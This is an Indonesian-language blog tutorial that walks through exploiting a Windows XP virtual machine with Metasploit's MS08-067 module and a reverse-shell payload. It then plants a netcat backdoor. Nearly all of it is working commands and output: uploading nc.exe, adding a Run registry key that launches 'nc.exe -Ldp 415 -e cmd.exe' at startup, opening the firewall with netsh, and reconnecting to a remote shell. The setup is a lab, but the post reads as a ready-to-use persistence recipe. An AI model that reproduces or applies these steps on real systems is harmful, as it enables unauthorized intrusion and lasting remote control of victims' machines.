[metasploit] netcat as backdoor

Netcat merupakan tools yang dapat menulis dan membaca data di jaringan TCP dan UDP, Netcat digunakan sebagai port scanner, backdoor (connect back), port redirect, membuka koneksi, dan hal – hal menarik lainya.. 😀 lebih jelasnya tentang netcat bisa searching google..

Sekarang kita coba netcat sebagai backdoor,

================================
Victim : Windows Xp sp2 (vmware)
IP : 172.16.125.128
port : 445 open
================================

exploit target

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set RHOST 172.16.125.128
RHOST => 172.16.125.128
msf exploit(ms08_067_netapi) > set LHOST 172.16.125.1
LHOST => 172.16.125.1
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.125.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (748544 bytes) to 172.16.125.128
[*] Meterpreter session 1 opened (172.16.125.1:4444 -> 172.16.125.128:1034) at 2010-09-01 23:47:28 +0000

metepreter sessions, upload netcat & buat value di registry target biar netcat selalu run pada saat system startup.

meterpreter > upload /pentest/windows-binaries/tools/nc.exe c:\\windows\\system32
[*] uploading  : /pentest/windows-binaries/tools/nc.exe -> c:\windows\system32
[*] uploaded   : /pentest/windows-binaries/tools/nc.exe -> c:\windows\system32\nc.exe
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v valuename -d 'C:\windows\system32\nc.exe -Ldp 415 -e cmd.exe'
Successful set valuename.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v valuename
Key: HKLM\software\microsoft\windows\currentversion\run
Name: valuename
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 415 -e cmd.exe

shell sessions, set firewall dengan netsh agar mengijinkan remote connect pada port yang sudah kita tentukan “415”

meterpreter > execute -f cmd.exe -i
Process 1944 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>netsh firewall add portopening TCP 415 "Service Firewall" ENABLE ALL
netsh firewall add portopening TCP 415 "Service Firewall" ENABLE ALL
Ok.

kita lihat port 415 apakah sudah ada & dengan status enable

C:\WINDOWS\system32>netsh firewall show portopening
netsh firewall show portopening

Port configuration for Domain profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service

Port configuration for Standard profile:
Port   Protocol  Mode     Name
-------------------------------------------------------------------
415    TCP       Enable   Service Firewall
139    TCP       Enable   NetBIOS Session Service
445    TCP       Enable   SMB over TCP
137    UDP       Enable   NetBIOS Name Service
138    UDP       Enable   NetBIOS Datagram Service
1900   UDP       Enable   SSDP Component of UPnP Framework
2869   TCP       Enable   UPnP Framework over TCP

diatas port 415 sudah enable, mesin target kita coba restart

C:\WINDOWS\system32>shutdown -r -t 0

saatnya remote connect use netcat, hehehe bisa masuk mesin target tanpa exploit, karena kita sudah mempunyai pintu belakang 😀

root@bt:~# nc 172.16.125.128 415
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator>net user
net user

User accounts for \\VICTIM

-------------------------------------------------------------------------------
Administrator            Guest                    HelpAssistant
SUPPORT_388945a0
The command completed successfully.


C:\Documents and Settings\Administrator>

Good Luck !!

Advertisements
This entry was posted in Metasploit. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s